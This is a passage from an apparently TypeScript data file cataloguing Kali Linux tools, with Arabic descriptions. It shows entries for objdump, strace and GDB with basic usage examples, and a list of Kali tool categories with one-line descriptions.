    description: "أداة عرض محتوى الملفات الكائنية. تعرض الـ assembly، الـ sections، والـ symbols.",
    command: "objdump -d <binary>",
    examples: "objdump -d program\nobjdump -t binary | grep main\nobjdump -s -j .data binary",
    tags: "reverse,disasm,binutils",
    popularity: 72,
  },
  {
    name: "Strace",
    category: "Reverse Engineering",
    description: "يتتبع استدعاءات النظام (syscalls) والإشارات. مفيد لفهم سلوك البرنامج.",
    command: "strace <command>",
    examples: "strace ls\nstrace -p 1234\nstrace -e trace=open,read program\nstrace -f -e trace=network program",
    tags: "trace,syscalls,debug",
    popularity: 75,
  },
  {
    name: "GDB",
    category: "Reverse Engineering",
    description: "GNU Debugger. مصحح أخطاء قوي لتحليل وتصحيح البرامج أثناء التشغيل.",
    command: "gdb <binary>",
    examples: "gdb program\ngdb -q program\n# داخل gdb:\n# break main\n# run\n# step\n# next\n# print variable",
    tags: "debug,reverse,binary",
    popularity: 85,
  },
]

export const kaliCategories = [
  "Information Gathering",
  "Vulnerability Analysis",
  "Web Application Analysis",
  "Password Attacks",
  "Wireless Attacks",
  "Exploitation Tools",
  "Sniffing & Spoofing",
  "Post Exploitation",
  "Forensics",
  "Social Engineering",
  "Reporting",
  "Stress Testing",
  "Hardware",
  "Reverse Engineering",
]

export const categoryDescriptions: Record<string, string> = {
  "Information Gathering": "جمع المعلومات عن الهدف من مصادر عامة وخاصة قبل الهجوم",
  "Vulnerability Analysis": "تحليل وتحديد الثغرات الأمنية في الأنظمة والشبكات",
  "Web Application Analysis": "اختبار اختراق تطبيقات الويب واكتشاف ثغراتها",
  "Password Attacks": "كسر كلمات المرور باستخدام brute-force، dictionary، و rainbow tables",
  "Wireless Attacks": "اختبار اختراق الشبكات اللاسلكية WiFi و Bluetooth",
  "Exploitation Tools": "أدوات استغلال الثغرات للحصول على وصول للأنظمة",
  "Sniffing & Spoofing": "استنشاق حركة المرور وانتحال الهوية في الشبكات",
  "Post Exploitation": "ما بعد الاختراق - تصعيد الصلاحيات والاستمرارية",
  "Forensics": "التحليل الجنائي الرقمي للأدلة الإلكترونية",
  "Social Engineering": "هندسة الاختراق الاجتماعي واختبار الوعي الأمني",
  "Reporting": "إعداد تقارير اختبار الاختراق وتوثيق النتائج",
  "Stress Testing": "اختبار الضغط وقياس قدرة الأنظمة على التحمل",
  "Hardware": "أدوات اختبار الأجهزة و IoT والأجهزة الطرفية",
  "Reverse Engineering": "هندسة عكسية للملفات الثنائية وتحليل البرمجيات الخبيثة",
}
